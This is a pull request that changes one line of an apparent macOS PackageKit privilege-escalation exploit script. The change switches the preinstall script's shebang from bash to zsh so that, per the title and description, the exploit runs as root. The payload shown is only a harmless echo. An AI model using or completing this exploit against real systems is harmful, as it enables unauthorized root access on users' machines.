### PR TITLE
Fixed exploit by adding zsh shebang to make it actually run in root mode

### DIFF
--- a/Binaries/Apple PackageKit/pkg_exploit.py
+++ b/Binaries/Apple PackageKit/pkg_exploit.py
@@ -32,7 +32,7 @@ class Exploit:
         Build a generic PKG with ZSH preinstall script
         """
         preinstall_script = tempfile.NamedTemporaryFile(delete=False)
-        preinstall_script.write(b"#!/bin/bash\necho 'hello world'\n")
+        preinstall_script.write(b"#!/bin/zsh\necho 'hello world'\n")
         preinstall_script.close()
 
         pkg_out = tempfile.NamedTemporaryFile(delete=False)


### PR DESCRIPTION
The pre-install script was ran using `#!/bin/bash` which would not trigger the payload. After changing it `#!/bin/zsh` now works. Nice find btw.